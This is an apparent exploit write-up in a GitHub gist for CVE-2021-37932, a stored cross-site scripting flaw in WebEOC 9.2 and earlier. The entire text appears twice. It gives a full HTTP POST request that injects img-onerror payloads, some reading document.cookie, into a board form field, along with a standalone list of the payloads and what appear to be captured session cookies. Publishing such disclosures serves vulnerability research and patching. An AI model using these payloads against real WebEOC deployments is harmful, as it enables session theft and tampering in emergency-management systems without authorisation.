0xx7/gist:be3ffad0f7e76c71f66e69dbacef242b

## gistfile1.txt
# Exploit Title: WebEOC Stored Cross-Site-Scripting <= 9.2
# Date: August/3/2021
# Exploit Author: Abdul Azeez Alaseeri
# Author page: https://www.linkedin.com/in/0xx777/
# Vendor Homepage: https://www.juvare.com/request-a-demo/webeoc/
# CVE-2021-37932


================================================================
WebEOC Stored Cross-Site-Scripting <= 9.2
================================================================


================================================================
Request Heeaders start
================================================================

POST /eoc/boards/boardpost.aspx?displayviewid=&viewid=2640&tableid=570 HTTP/1.1
Host: Hidden
Cookie: webeoc.=!OCl+hYX/ZyfS0djPbUkHBjq03e8BYZoTS+yy9DZmbvKVQD7TAIv0po3/v7b6j0k7ynaG1sJmF0vbGgE=; TS011670b7=01eb724811d6c47111514ec4cb7c5b04c0d3904bab47b39c1868715f31e79083e3cca3405c872e8519c6686b7530d6eba1f532be1d; ASP.NET_SessionId=tsd0zspl5yoh0vf3vwae0fr5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------756200613402202119837915430
Content-Length: 15340
Origin: Hidden
Referer: https://Hidden/eoc/boards/boarddata.ashx?command=DATA&dataid=245123&incidentid=76&min=False&permlevel=-1&uvid=1.2470.419941&relateddataid=0&tableid=570&viewid=2640&pdfoptions=null&filter=%7B%7D&vparams=%5B%5D
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close


-----------------------------756200613402202119837915430
Content-Disposition: form-data; name="CSRFToken"

**
-----------------------------756200613402202119837915430
Content-Disposition: form-data; name="_webeoc_hash_save"

**
-----------------------------756200613402202119837915430
Content-Disposition: form-data; name="weodate"


-----------------------------756200613402202119837915430
Content-Disposition: form-data; name="DescriptionHistory"

[{"DescriptionHistoryID":3,"ActionDate":"08/02/2021 15:03:02","UserName":"HIDDEN","PositionName":"Surveillance%20Admin","Description":"%22%3E%3Cimg%20src%3DX%20onerror%3Dalert(document.cookie)%3E"},{"DescriptionHistoryID":2,"ActionDate":"08/02/2021 15:03:02","UserName":"HIDDEN","PositionName":"Surveillance%20Admin","Description":"%22%3E%3Cimg%20src%3DX%20onerror%3Dalert(1)%3E"},{"DescriptionHistoryID":1,"ActionDate":"08/02/2021 14:54:58","UserName":"HIDDEN","PositionName":"Surveillance%20Admin","Description":"%3Ch1%3EAAA%3C%2Fh1%3EAAA"},{"DescriptionHistoryID":4,"ActionDate":"08/02/2021 15:03:02","UserName":"HIDDEN","PositionName":"Surveillance%20Admin","Description":"%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"},{"DescriptionHistoryID":5,"ActionDate":"08/02/2021 15:03:02","UserName":"HIDDEN","PositionName":"Surveillance%20Admin","Description":"%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"},{"DescriptionHistoryID":6,"ActionDate":"08/02/2021 15:03:02","UserName":"HIDDEN","PositionName":"Surveillance%20Admin","Description":"%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"}]
-----------------------------756200613402202119837915430
Content-Disposition: form-data; name="CheckCaseAcceptance"

Yes
-----------------------------756200613402202119837915430
Content-Disposition: form-data; name="cmdSave"


-----------------------------756200613402202119837915430
Content-Disposition: form-data; name="_weoc_savebuttonredirect"


================================================================
Request Heeaders end
================================================================


In the response, I got the pop up window for each payload as shown in the screenshot:

https://drive.google.com/file/d/16SPXo7JKF9bLXKpdTCxr1MwBAJg9ruq-/view?usp=sharing
https://drive.google.com/file/d/1Ibd7V_34iy3dVUMx6t0Trclsr9aGhVYr/view?usp=sharing


Payloads:

%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E
%22%3E%3Cimg%20src%3DX%20onerror%3Dalert(document.cookie)%3E
%22%3E%3Cimg%20src%3DX%20onerror%3Dalert(1)%3E
	# Exploit Title: WebEOC Stored Cross-Site-Scripting <= 9.2
	# Date: August/3/2021
	# Exploit Author: Abdul Azeez Alaseeri
	# Author page: https://www.linkedin.com/in/0xx777/
	# Vendor Homepage: https://www.juvare.com/request-a-demo/webeoc/
	# CVE-2021-37932



	================================================================
	WebEOC Stored Cross-Site-Scripting <= 9.2
	================================================================


	================================================================
	Request Heeaders start
	================================================================

	POST /eoc/boards/boardpost.aspx?displayviewid=&viewid=2640&tableid=570 HTTP/1.1
	Host: Hidden
	Cookie: webeoc.=!OCl+hYX/ZyfS0djPbUkHBjq03e8BYZoTS+yy9DZmbvKVQD7TAIv0po3/v7b6j0k7ynaG1sJmF0vbGgE=; TS011670b7=01eb724811d6c47111514ec4cb7c5b04c0d3904bab47b39c1868715f31e79083e3cca3405c872e8519c6686b7530d6eba1f532be1d; ASP.NET_SessionId=tsd0zspl5yoh0vf3vwae0fr5
	User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Content-Type: multipart/form-data; boundary=---------------------------756200613402202119837915430
	Content-Length: 15340
	Origin: Hidden
	Referer: https://Hidden/eoc/boards/boarddata.ashx?command=DATA&dataid=245123&incidentid=76&min=False&permlevel=-1&uvid=1.2470.419941&relateddataid=0&tableid=570&viewid=2640&pdfoptions=null&filter=%7B%7D&vparams=%5B%5D
	Upgrade-Insecure-Requests: 1
	Te: trailers
	Connection: close


	-----------------------------756200613402202119837915430
	Content-Disposition: form-data; name="CSRFToken"

	**
	-----------------------------756200613402202119837915430
	Content-Disposition: form-data; name="_webeoc_hash_save"

	**
	-----------------------------756200613402202119837915430
	Content-Disposition: form-data; name="weodate"


	-----------------------------756200613402202119837915430
	Content-Disposition: form-data; name="DescriptionHistory"

	[{"DescriptionHistoryID":3,"ActionDate":"08/02/2021 15:03:02","UserName":"HIDDEN","PositionName":"Surveillance%20Admin","Description":"%22%3E%3Cimg%20src%3DX%20onerror%3Dalert(document.cookie)%3E"},{"DescriptionHistoryID":2,"ActionDate":"08/02/2021 15:03:02","UserName":"HIDDEN","PositionName":"Surveillance%20Admin","Description":"%22%3E%3Cimg%20src%3DX%20onerror%3Dalert(1)%3E"},{"DescriptionHistoryID":1,"ActionDate":"08/02/2021 14:54:58","UserName":"HIDDEN","PositionName":"Surveillance%20Admin","Description":"%3Ch1%3EAAA%3C%2Fh1%3EAAA"},{"DescriptionHistoryID":4,"ActionDate":"08/02/2021 15:03:02","UserName":"HIDDEN","PositionName":"Surveillance%20Admin","Description":"%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"},{"DescriptionHistoryID":5,"ActionDate":"08/02/2021 15:03:02","UserName":"HIDDEN","PositionName":"Surveillance%20Admin","Description":"%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"},{"DescriptionHistoryID":6,"ActionDate":"08/02/2021 15:03:02","UserName":"HIDDEN","PositionName":"Surveillance%20Admin","Description":"%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"}]
	-----------------------------756200613402202119837915430
	Content-Disposition: form-data; name="CheckCaseAcceptance"

	Yes
	-----------------------------756200613402202119837915430
	Content-Disposition: form-data; name="cmdSave"




	-----------------------------756200613402202119837915430
	Content-Disposition: form-data; name="_weoc_savebuttonredirect"



	================================================================
	Request Heeaders end
	================================================================


	In the response, I got the pop up window for each payload as shown in the screenshot:

	https://drive.google.com/file/d/16SPXo7JKF9bLXKpdTCxr1MwBAJg9ruq-/view?usp=sharing
	https://drive.google.com/file/d/1Ibd7V_34iy3dVUMx6t0Trclsr9aGhVYr/view?usp=sharing



	Payloads:

	%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E
	%22%3E%3Cimg%20src%3DX%20onerror%3Dalert(document.cookie)%3E
	%22%3E%3Cimg%20src%3DX%20onerror%3Dalert(1)%3E